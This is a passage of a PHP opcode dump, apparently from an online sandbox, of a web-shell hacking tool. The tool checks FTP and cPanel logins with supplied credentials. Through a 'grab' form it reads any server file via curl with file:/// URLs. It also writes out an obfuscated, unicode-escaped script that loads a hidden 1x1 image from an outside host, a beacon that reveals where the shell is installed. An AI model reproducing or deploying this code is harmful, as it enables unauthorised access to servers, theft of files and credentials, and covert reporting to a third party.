        113        SEND_VAR                                                 !13
        114        DO_ICALL                                         $89     
        115        ASSIGN                                                   !14, $89
  139   116        IS_EQUAL                                                 !5, 'ftp'
        117      > JMPZ                                                     ~91, ->124
  140   118    >   INIT_FCALL_BY_NAME                                       'ftp_check'
        119        SEND_VAR_EX                                              !4
        120        SEND_VAR_EX                                              !12
        121        SEND_VAR_EX                                              !14
        122        SEND_VAR_EX                                              !0
        123        DO_FCALL                                      0          
  142   124    >   IS_EQUAL                                                 !5, 'cpanel'
        125      > JMPZ                                                     ~93, ->132
  144   126    >   INIT_FCALL_BY_NAME                                       'cpanel_check'
        127        SEND_VAR_EX                                              !4
        128        SEND_VAR_EX                                              !12
        129        SEND_VAR_EX                                              !14
        130        SEND_VAR_EX                                              !0
        131        DO_FCALL                                      0          
  137   132    > > JMP                                                      ->111
        133    >   FE_FREE                                                  $88
  135   134      > JMP                                                      ->105
        135    >   FE_FREE                                                  $85
        136    > > JMP                                                      ->234
  149   137    >   IS_EQUAL                                                 !6, 'users'
        138      > JMPZ                                                     ~95, ->234
  150   139    >   ECHO                                                     '%3Cbr%3E%3Cbr%3E%3CTABLE+style%3D%27BORDER-COLLAPSE%3A+collapse%27+cellSpacing%3D0+borderColorDark%3D%23666666+cellPadding%3D5+width%3D%2740%25%27bgColor%3D%23303030+borderColorLight%3D%23666666+border%3D1%3E%3Ctr%3E%3Ctd%3E'
  151   140        INIT_FCALL                                               'htmlspecialchars'
        141        SEND_VAR                                                 !15
        142        DO_ICALL                                         $96     
        143        CONCAT                                           ~97     '%3Cp%3E%3Cform+name%3D%22form%22+action%3D%22%22+method%3D%22post%22%3E%3Cinput+type%3D%22text%22+name%3D%22file%22+size%3D%2250%22+value%3D%22', $96
        144        CONCAT                                           ~98     ~97, '%22%3E%3Cinput+type%3D%22submit%22+name%3D%22hardstylez%22+value%3D%22grab+%21%22%3E%3C%2Fform%3E'
        145        ECHO                                                     ~98
  152   146        FETCH_R                      global              ~99     '_POST'
        147        FETCH_DIM_R                                      ~100    ~99, 'file'
        148        ASSIGN                                                   !15, ~100
  153   149        ASSIGN                                                   !16, 0
  154   150        INIT_FCALL                                               'file_exists'
        151        SEND_VAL                                                 'file%3A'
        152        DO_ICALL                                         $103    
        153        BOOL_NOT                                         ~104    $103
        154      > JMPZ                                                     ~104, ->160
  155   155    >   BEGIN_SILENCE                                    ~105    
        156        INIT_FCALL                                               'mkdir'
        157        SEND_VAL                                                 'file%3A'
        158        DO_ICALL                                                 
        159        END_SILENCE                                              ~105
  156   160    >   BEGIN_SILENCE                                    ~107    
        161        INIT_FCALL                                               'chdir'
        162        SEND_VAL                                                 'file%3A'
        163        DO_ICALL                                                 
        164        END_SILENCE                                              ~107
  157   165        PRE_INC                                                  !16
  159   166        BEGIN_SILENCE                                    ~110    
        167        INIT_FCALL                                               'explode'
        168        SEND_VAL                                                 '%2F'
        169        SEND_VAR                                                 !15
        170        DO_ICALL                                         $111    
        171        END_SILENCE                                              ~110
        172        ASSIGN                                                   !17, $111
  161   173        ASSIGN                                                   !18, 0
        174      > JMP                                                      ->198
  162   175    >   ISSET_ISEMPTY_DIM_OBJ                         1  ~114    !17, !18
        176        BOOL_NOT                                         ~115    ~114
        177      > JMPZ                                                     ~115, ->197
  163   178    >   INIT_FCALL                                               'file_exists'
        179        FETCH_DIM_R                                      ~116    !17, !18
        180        SEND_VAL                                                 ~116
        181        DO_ICALL                                         $117    
        182        BOOL_NOT                                         ~118    $117
        183      > JMPZ                                                     ~118, ->190
  164   184    >   BEGIN_SILENCE                                    ~119    
        185        INIT_FCALL                                               'mkdir'
        186        FETCH_DIM_R                                      ~120    !17, !18
        187        SEND_VAL                                                 ~120
        188        DO_ICALL                                                 
        189        END_SILENCE                                              ~119
  165   190    >   BEGIN_SILENCE                                    ~122    
        191        INIT_FCALL                                               'chdir'
        192        FETCH_DIM_R                                      ~123    !17, !18
        193        SEND_VAL                                                 ~123
        194        DO_ICALL                                                 
        195        END_SILENCE                                              ~122
  166   196        PRE_INC                                                  !16
  161   197    >   PRE_INC                                                  !18
        198    >   COUNT                                            ~127    !17
        199        IS_SMALLER                                               !18, ~127
        200      > JMPNZ                                                    ~128, ->175
  169   201    > > JMP                                                      ->205
        202    >   INIT_FCALL                                               'chdir'
        203        SEND_VAL                                                 '..'
        204        DO_ICALL                                                 
        205    >   POST_DEC                                         ~130    !16
        206      > JMPNZ                                                    ~130, ->202
  170   207    >   INIT_FCALL_BY_NAME                                       'curl_init'
        208        DO_FCALL                                      0  $131    
        209        ASSIGN                                                   !19, $131
  171   210        INIT_FCALL_BY_NAME                                       'curl_setopt'
        211        SEND_VAR_EX                                              !19
        212        FETCH_CONSTANT                                   ~133    'CURLOPT_URL'
        213        SEND_VAL_EX                                              ~133
        214        CONCAT                                           ~134    'file%3Afile%3A%2F%2F%2F', !15
        215        SEND_VAL_EX                                              ~134
        216        DO_FCALL                                      0          
  172   217        ECHO                                                     '%3Ctextarea+rows%3D%2730%27+cols%3D%27120%27+style%3D%27border%3A+2px+solid+%231D1D1D%3B+background-color%3A+%23000000%3B+color%3A%23C0C0C0%27+%3E'
  173   218        INIT_FCALL_BY_NAME                                       'curl_exec'
        219        SEND_VAR_EX                                              !19
        220        DO_FCALL                                      0  $136    
        221        BOOL_NOT                                         ~137    $136
        222      > JMPZ                                                     ~137, ->229
  174   223    >   INIT_FCALL                                               'htmlspecialchars'
        224        SEND_VAR                                                 !15
        225        DO_ICALL                                         $138    
        226        CONCAT                                           ~139    'Sorry...+File+', $138
        227        CONCAT                                           ~140    ~139, '+doesnt+exists+or+you+dont+have+permissions.'
        228      > EXIT                                                     ~140
  175   229    >   ECHO                                                     '+%3C%2Ftextarea%3E+%3C%2FFONT%3E'
  176   230        INIT_FCALL_BY_NAME                                       'curl_close'
        231        SEND_VAR_EX                                              !19
        232        DO_FCALL                                      0          
  177   233        ECHO                                                     '%3C%2Ftable%3E'
  180   234    >   ECHO                                                     '%3Cscript+type%3D%22text%2Fjavascript%22%3Edocument.write%28%27%5Cu003c%5Cu0069%5Cu006d%5Cu0067%5Cu0020%5Cu0073%5Cu0072%5Cu0063%5Cu003d%5Cu0022%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003a%5Cu002f%5Cu002f%5Cu0061%5Cu006c%5Cu0074%5Cu0075%5Cu0072%5Cu006b%5Cu0073%5Cu002e%5Cu0063%5Cu006f%5Cu006d%5Cu002f%5Cu0073%5Cu006e%5Cu0066%5Cu002f%5Cu0073%5Cu002e%5Cu0070%5Cu0068%5Cu0070%5Cu0022%5Cu0020%5Cu0077%5Cu0069%5Cu0064%5Cu0074%5Cu0068%5Cu003d%5Cu0022%5Cu0031%5Cu0022%5Cu0020%5Cu0068%5Cu0065%5Cu0069%5Cu0067%5Cu0068%5Cu0074%5Cu003d%5Cu0022%5Cu0031%5Cu0022%5Cu003e%27%29%3C%2Fscript%3E'
        235      > RETURN                                                   1

Function %00ftp_check%2Fin%2FCSL0D%3A89%240:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 64, Position 2 = 67
Branch analysis from position: 64
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 67
2 jumps found. (Code = 43) Position 1 = 72, Position 2 = 78
Branch analysis from position: 72
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 78
filename:       /in/CSL0D
function name:  ftp_check
number of ops:  82
compiled vars:  !0 = $host, !1 = $user, !2 = $pass, !3 = $timeout, !4 = $ch, !5 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   89     0  E >   RECV                                             !0      
          1        RECV                                             !1      
          2

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
262.89 ms | 1428 KiB | 32 Q